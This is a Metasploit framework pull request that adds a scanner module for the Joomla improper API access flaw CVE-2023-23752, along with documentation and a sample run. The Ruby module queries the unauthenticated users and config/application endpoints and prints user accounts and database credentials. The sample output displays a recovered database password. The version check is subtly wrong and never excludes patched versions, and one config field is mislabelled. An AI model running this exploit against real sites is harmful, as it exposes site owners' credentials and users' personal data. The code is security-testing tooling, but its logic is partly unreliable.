### PR TITLE
Joomla Improper API Access Checks (cve-2023-23752)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.md
+++ b/documentation/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.md
@@ -3,7 +3,7 @@
 
 Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
 This vulnerability allows unauthenticated users access to webservice endpoints which contain
-sensitive information.  Specifically for this module we exploit the users and config/application
+sensitive information. Specifically for this module we exploit the users and config/application
 endpoints.
 
 This module was tested against Joomla 4.2.7 running on Docker.
@@ -28,7 +28,7 @@ Browse to port 80, and finish the installation
 
 1. Install the application, and finish the configuration
 2. Start msfconsole
-3. Do: `use auxiliary/scanner/http/joomla_improper_access_checks`
+3. Do: `use auxiliary/scanner/http/joomla_api_improper_access_checks`
 4. Do: `set rhosts [ip]`
 5. Do: `run`
 6. You should get sensitive information about the users and configuration

--- a/documentation/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.md
+++ b/documentation/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.md
@@ -1,0 +1,77 @@
+
+## Vulnerable Application
+
+Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
+This vulnerability allows unauthenticated users access to webservice endpoints which contain
+sensitive information.  Specifically for this module we exploit the users and config/application
+endpoints.
+
+This module was tested against Joomla 4.2.7 running on Docker.
+
+## Install Joomla on Ubuntu 22.04
+
+From https://www.techrepublic.com/article/how-to-deploy-joomla-docker/
+```
+sudo apt-get install docker.io -y
+sudo docker network create joomla-network
+sudo docker pull mysql:5.7
+sudo docker pull joomla:4.2.7-php8.1-apache
+sudo docker volume create mysql-data
+sudo docker run -d --name joomladb  -v mysql-data:/var/lib/mysql --network joomla-network -e "MYSQL_ROOT_PASSWORD=PWORD" -e MYSQL_USER=joomla -e "MYSQL_PASSWORD=PWORD" -e "MYSQL_DATABASE=joomla" mysql:5.7
+sudo docker volume create joomla-data
+sudo docker run -d --name joomla -p 80:80 -v joomla-data:/var/www/html --network joomla-network -e JOOMLA_DB_HOST=joomladb -e JOOMLA_DB_USER=joomla -e JOOMLA_DB_PASSWORD=PWORD joomla
+```
+
+Browse to port 80, and finish the installation
+
+## Verification Steps
+
+1. Install the application, and finish the configuration
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/joomla_improper_access_checks`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get sensitive information about the users and configuration
+
+## Scenarios
+
+### Version 4.2.7 from Docker
+
+```
+└─$ ./msfconsole -qr joomla_improper.rb
+[*] Processing joomla_improper.rb for ERB directives.
+resource (joomla_improper.rb)> use auxiliary/scanner/http/joomla_api_improper_access_checks
+resource (joomla_improper.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (joomla_improper.rb)> set verbose true
+verbose => true
+resource (joomla_improper.rb)> run
+[*] Joomla version detected: 4.2.7
+[+] Joomla version 4.2.7 is vulnerable
+[*] Attempting user enumeration
+[+] Users JSON saved to /root/.msf4/loot/20230416225106_default_1.1.1.1_joomla_users_jso_345565.json
+[+] Joomla Users
+============
+
+ ID   Super User  Name    Username  Email          Send Email  Register Date        Last Visit Date  Group Names
+ --   ----------  ----    --------  -----          ----------  -------------        ---------------  -----------
+ 400  *           joomla  joomla    none@none.com  1           2023-04-16 23:07:42                   Super Users
+
+[*] Attempting config enumeration
+[+] Config JSON saved to /root/.msf4/loot/20230416225106_default_1.1.1.1_joomla_config_js_812393.json
+[+] Joomla Config
+=============
+
+ Setting      Value
+ -------      -----
+ db host      joomladb3
+ db name      joomla_db
+ db password  PWORD
+ db prefix    l57cr_
+ db prefix    0
+ db user      root
+ dbtype       mysqli
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.rb
+++ b/modules/auxiliary/scanner/http/joomla_api_improper_access_checks.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Joomla
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Joomla API Improper Access Checks',
+        'Description' => %q{
+          Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
+          This vulnerability allows unauthenticated users access to webservice endpoints which contain
+          sensitive information.  Specifically for this module we exploit the users and config/application
+          endpoints.
+          This module was tested against Joomla 4.2.7 running on Docker.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Tianji Lab' # original PoC, analysis
+        ],
+        'References' => [
+          [ 'EDB', '51334' ],
+          [ 'URL', 'https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html'],
+          [ 'URL', 'https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/'],
+          [ 'URL', 'https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752'],
+          [ 'CVE', '2023-23752']
+        ],
+        'Targets' => [
+          [ 'Joomla 4.0.0 - 4.2.7', {}]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2023-02-01',
+        'DefaultTarget' => 0
+      )
+    )
+    # set the default port, and a URI that a user can set if the app isn't installed to the root
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Joomla Application', '/'])
+      ]
+    )
+  end
+
+  def run_host(ip)
+    # check
+    unless joomla_and_online?
+      print_error("#{peer} - Could not connect to web service or not detected as Joomla")
+      return
+    end
+
+    version = joomla_version
+    if version.nil?
+      print_error("#{peer} - Unable to determine Joomla Version")
+      return
+    end
+
+    vprint_status("Joomla version detected: #{version}")
+    if version < Rex::Version.new('4.0.0') && version >= Rex::Version.new('4.2.8')
+      return
+    end
+
+    print_good("Joomla version #{version} is vulnerable")
+
+    vprint_status('Attempting user enumeration')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'index.php', 'v1', 'users'),
+      'headers' => {
+        # header is needed, it passes back JSON anyways.
+        'Accept' => '*/*'
+      },
+      'vars_get' => {
+        'public' => 'true'
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly (response code: #{res.code})") unless res.code == 200
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Joomla Users',
+      'Indent' => 1,
+      'Columns' => [ 'ID', 'Super User', 'Name', 'Username', 'Email', 'Send Email', 'Register Date', 'Last Visit Date', 'Group Names' ]
+    )
+
+    loot_path = store_loot('joomla_users_json', 'application/json', datastore['RHOSTS'], ip, 'joomla_users.json')
+    print_good("Users JSON saved to #{loot_path}")
+
+    users = res.get_json_document
+    users = users['data']
+    users.each do |user|
+      unless user['type'] == 'users'
+        next
+      end
+
+      tbl << [ user['attributes']['id'].to_s, user['attributes']['group_names'].include?('Super Users') ? '*' : '', user['attributes']['name'].to_s, user['attributes']['username'].to_s, user['attributes']['email'].to_s, user['attributes']['sendEmail'].to_s, user['attributes']['registerDate'].to_s, user['attributes']['lastvisitDate'].to_s, user['attributes']['group_names'].to_s ]
+    end
+
+    print_good(tbl.to_s)
+
+    vprint_status('Attempting config enumeration')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'index.php', 'v1', 'config', 'application'),
+      'headers' => {
+        # header is needed, it passes back JSON anyways.
+        'Accept' => '*/*'
+      },
+      'vars_get' => {
+        'public' => 'true'
+      }
+    )
+
+    # a valid login will give us a 301 redirect to /home.html so check that.
+    # ALWAYS assume res could be nil and check it first!!!!!
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly (response code: #{res.code})") unless res.code == 200
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Joomla Config',
+      'Indent' => 1,
+      'Columns' => [ 'Setting', 'Value' ]
+    )
+
+    loot_path = store_loot('joomla_config_json', 'application/json', datastore['RHOSTS'], ip, 'joomla_config.json')
+    print_good("Config JSON saved to #{loot_path}")
+
+    config = res.get_json_document
+    config = config['data']
+    config.each do |setting|
+      if setting['attributes'].key?('dbtype')
+        tbl << [ 'dbtype', setting['attributes']['dbtype'].to_s ]
+      elsif setting['attributes'].key?('host')
+        tbl << [ 'db host', setting['attributes']['host'].to_s ]
+      elsif setting['attributes'].key?('password')
+        tbl << [ 'db password', setting['attributes']['password'].to_s ]
+      elsif setting['attributes'].key?('user')
+        tbl << [ 'db user', setting['attributes']['user'].to_s ]
+      elsif setting['attributes'].key?('db')
+        tbl << [ 'db name', setting['attributes']['db'].to_s ]
+      elsif setting['attributes'].key?('dbprefix')
+        tbl << [ 'db prefix', setting['attributes']['dbprefix'].to_s ]
+      elsif setting['attributes'].key?('dbencryption')
+        tbl << [ 'db prefix', setting['attributes']['dbencryption'].to_s ]
+      end
+    end
+
+    print_good(tbl.to_s)
+  end
+end


### PR DESCRIPTION
Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
This vulnerability allows unauthenticated users access to webservice endpoints which contain
sensitive information.  Specifically for this module we exploit the users and config/application
endpoints.

This module was tested against Joomla 4.2.7 running on Docker.

## Verification

- [ ] Install the application, and finish the configuration
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/joomla_improper_access_checks`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should get sensitive information about the users and configuration
